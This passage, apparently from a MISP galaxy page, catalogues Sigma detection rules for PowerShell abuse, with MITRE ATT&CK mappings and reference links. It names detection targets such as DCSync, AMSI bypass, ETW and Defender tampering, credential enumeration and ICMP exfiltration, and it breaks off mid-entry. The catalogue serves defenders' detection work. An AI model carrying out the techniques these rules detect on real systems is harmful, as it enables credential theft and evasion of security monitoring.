https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md

https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/

https://github.com/S3cur3Th1sSh1t/WinPwn

repo[0]=redcanaryco/atomic-red-team[repo[0]=redcanaryco/atomic-red-team]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml

Suspicious Get-ADReplAccount

The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

The tag is: misp-galaxy:sigma-rules="Suspicious Get-ADReplAccount"

Suspicious Get-ADReplAccount has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

Table 9690. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount

https://www.powershellgallery.com/packages/DSInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml

Disable of ETW Trace - Powershell

Detects usage of powershell cmdlets to disable or remove ETW trace sessions

The tag is: misp-galaxy:sigma-rules="Disable of ETW Trace - Powershell"

Disable of ETW Trace - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 9691. Table References

Links

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml

Change PowerShell Policies to an Insecure Level - PowerShell

Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet.

The tag is: misp-galaxy:sigma-rules="Change PowerShell Policies to an Insecure Level - PowerShell"

Change PowerShell Policies to an Insecure Level - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9692. Table References

Links

https://adsecurity.org/?p=2604

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml

DirectorySearcher Powershell Exploitation

Enumerates Active Directory to determine computers that are joined to the domain

The tag is: misp-galaxy:sigma-rules="DirectorySearcher Powershell Exploitation"

DirectorySearcher Powershell Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

Table 9693. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml

Suspicious Unblock-File

Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.

The tag is: misp-galaxy:sigma-rules="Suspicious Unblock-File"

Suspicious Unblock-File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005" with estimative-language:likelihood-probability="almost-certain"

Table 9694. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml

Powershell Suspicious Win32_PnPEntity

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.

The tag is: misp-galaxy:sigma-rules="Powershell Suspicious Win32_PnPEntity"

Powershell Suspicious Win32_PnPEntity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

Table 9695. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml

Enumerate Credentials from Windows Credential Manager With PowerShell

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

The tag is: misp-galaxy:sigma-rules="Enumerate Credentials from Windows Credential Manager With PowerShell"

Enumerate Credentials from Windows Credential Manager With PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 9696. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml

Invoke-Obfuscation Via Use Rundll32 - PowerShell

Detects Obfuscated Powershell via use Rundll32 in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - PowerShell"

Invoke-Obfuscation Via Use Rundll32 - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9697. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging

Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging"

Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9698. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml

Powershell Execute Batch Script

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system

The tag is: misp-galaxy:sigma-rules="Powershell Execute Batch Script"

Powershell Execute Batch Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9699. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell"

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9700. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml

Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript

Detects usage of the "Add-AppxPackage" or it’s alias "Add-AppPackage" to install unsigned AppX packages

The tag is: misp-galaxy:sigma-rules="Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript"

Table 9701. Table References

Links

https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package

https://twitter.com/WindowsDocs/status/1620078135080325122

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml

Modify Group Policy Settings - ScriptBlockLogging

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

The tag is: misp-galaxy:sigma-rules="Modify Group Policy Settings - ScriptBlockLogging"

Modify Group Policy Settings - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001" with estimative-language:likelihood-probability="almost-certain"

Table 9702. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml

Powershell Store File In Alternate Data Stream

Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.

The tag is: misp-galaxy:sigma-rules="Powershell Store File In Alternate Data Stream"

Powershell Store File In Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9703. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml

Windows Screen Capture with CopyFromScreen

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations

The tag is: misp-galaxy:sigma-rules="Windows Screen Capture with CopyFromScreen"

Windows Screen Capture with CopyFromScreen has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 9704. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml

Suspicious PowerShell Download - Powershell Script

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download - Powershell Script"

Suspicious PowerShell Download - Powershell Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9705. Table References

Links

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml

PowerShell Credential Prompt

Detects PowerShell calling a credential prompt

The tag is: misp-galaxy:sigma-rules="PowerShell Credential Prompt"

PowerShell Credential Prompt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9706. Table References

Links

https://t.co/ezOTGy1a1G

https://twitter.com/JohnLaTwC/status/850381440629981184

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml

Execute Invoke-command on Remote Host

Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Execute Invoke-command on Remote Host"

Execute Invoke-command on Remote Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9707. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml

Powershell Add Name Resolution Policy Table Rule

Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.

The tag is: misp-galaxy:sigma-rules="Powershell Add Name Resolution Policy Table Rule"

Powershell Add Name Resolution Policy Table Rule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"

Table 9708. Table References

Links

https://twitter.com/NathanMcNulty/status/1569497348841287681

https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml

Malicious PowerShell Keywords

Detects keywords from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Keywords"

Malicious PowerShell Keywords has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9709. Table References

Links

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml

PowerShell Set-Acl On Windows Folder - PsScript

Detects PowerShell scripts to set the ACL to a file in the Windows folder

The tag is: misp-galaxy:sigma-rules="PowerShell Set-Acl On Windows Folder - PsScript"

PowerShell Set-Acl On Windows Folder - PsScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Permissions Modification - T1222" with estimative-language:likelihood-probability="almost-certain"

Table 9710. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml

Invoke-Obfuscation VAR+ Launcher - PowerShell

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - PowerShell"

Invoke-Obfuscation VAR+ Launcher - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9711. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

The tag is: misp-galaxy:sigma-rules="AD Groups Or Users Enumeration Using PowerShell - ScriptBlock"

AD Groups Or Users Enumeration Using PowerShell - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9712. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml

PowerShell Write-EventLog Usage

Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use

The tag is: misp-galaxy:sigma-rules="PowerShell Write-EventLog Usage"

Table 9713. Table References

Links

https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml

Potential Active Directory Enumeration Using AD Module - PsScript

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Enumeration Using AD Module - PsScript"

Table 9714. Table References

Links

https://twitter.com/cyb3rops/status/1617108657166061568?s=20

https://github.com/samratashok/ADModule

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml

PowerShell ADRecon Execution

Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7

The tag is: misp-galaxy:sigma-rules="PowerShell ADRecon Execution"

PowerShell ADRecon Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9715. Table References

Links

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml

Suspicious GPO Discovery With Get-GPO

Detect use of Get-GPO to get one GPO or all the GPOs in a domain.

The tag is: misp-galaxy:sigma-rules="Suspicious GPO Discovery With Get-GPO"

Suspicious GPO Discovery With Get-GPO has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

Table 9716. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml

Disable-WindowsOptionalFeature Command PowerShell

Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

The tag is: misp-galaxy:sigma-rules="Disable-WindowsOptionalFeature Command PowerShell"

Disable-WindowsOptionalFeature Command PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9717. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml

Powershell LocalAccount Manipulation

Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups

The tag is: misp-galaxy:sigma-rules="Powershell LocalAccount Manipulation"

Powershell LocalAccount Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9718. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml

PowerShell ICMP Exfiltration

Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

The tag is: misp-galaxy:sigma-rules="PowerShell ICMP Exfiltration"

PowerShell ICMP Exfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9719. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml

Silence.EDA Detection

Detects Silence EmpireDNSAgent as described in the Group-IP report

The tag is: misp-galaxy:sigma-rules="Silence.EDA Detection"

Silence.EDA Detection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 9720. Table References

Links

https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml

Testing Usage of Uncommonly Used Port

Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.

The tag is: misp-galaxy:sigma-rules="Testing Usage of Uncommonly Used Port"

Testing Usage of Uncommonly Used Port has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9721. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell

https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml

PowerShell Hotfix Enumeration

Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers

The tag is: misp-galaxy:sigma-rules="PowerShell Hotfix Enumeration"

Table 9722. Table References

Links

https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml

Replace Desktop Wallpaper by Powershell

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper

The tag is: misp-galaxy:sigma-rules="Replace Desktop Wallpaper by Powershell"

Replace Desktop Wallpaper by Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9723. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml

Potential WinAPI Calls Via PowerShell Scripts

Detects use of WinAPI functions in PowerShell scripts

The tag is: misp-galaxy:sigma-rules="Potential WinAPI Calls Via PowerShell Scripts"

Potential WinAPI Calls Via PowerShell Scripts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 9724. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_api_susp_access.yml

Potential AMSI Bypass Script Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Script Using NULL Bits"

Potential AMSI Bypass Script Using NULL Bits has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9725. Table References

Links

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

The tag is: misp-galaxy:sigma-rules="Live Memory Dump Using Powershell"

Live Memory Dump Using Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9726. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml

AADInternals PowerShell Cmdlets Execution - PsScript

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

The tag is: misp-galaxy:sigma-rules="AADInternals PowerShell Cmdlets Execution - PsScript"

Table 9727. Table References

Links

https://o365blog.com/aadinternals/

https://github.com/Gerenios/AADInternals

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell"

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9728. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml

Potential PowerShell Obfuscation Using Alias Cmdlets

Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Using Alias Cmdlets"

Potential PowerShell Obfuscation Using Alias Cmdlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9729. Table References

Links

https://github.com/1337Rin/Swag-PSO

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml

Suspicious New-PSDrive to Admin Share

Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

The tag is: misp-galaxy:sigma-rules="Suspicious New-PSDrive to Admin Share"

Suspicious New-PSDrive to Admin Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9730. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml

Request A Single Ticket via PowerShell

utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.

The tag is: misp-galaxy:sigma-rules="Request A Single Ticket via PowerShell"

Request A Single Ticket via PowerShell has relationships with:

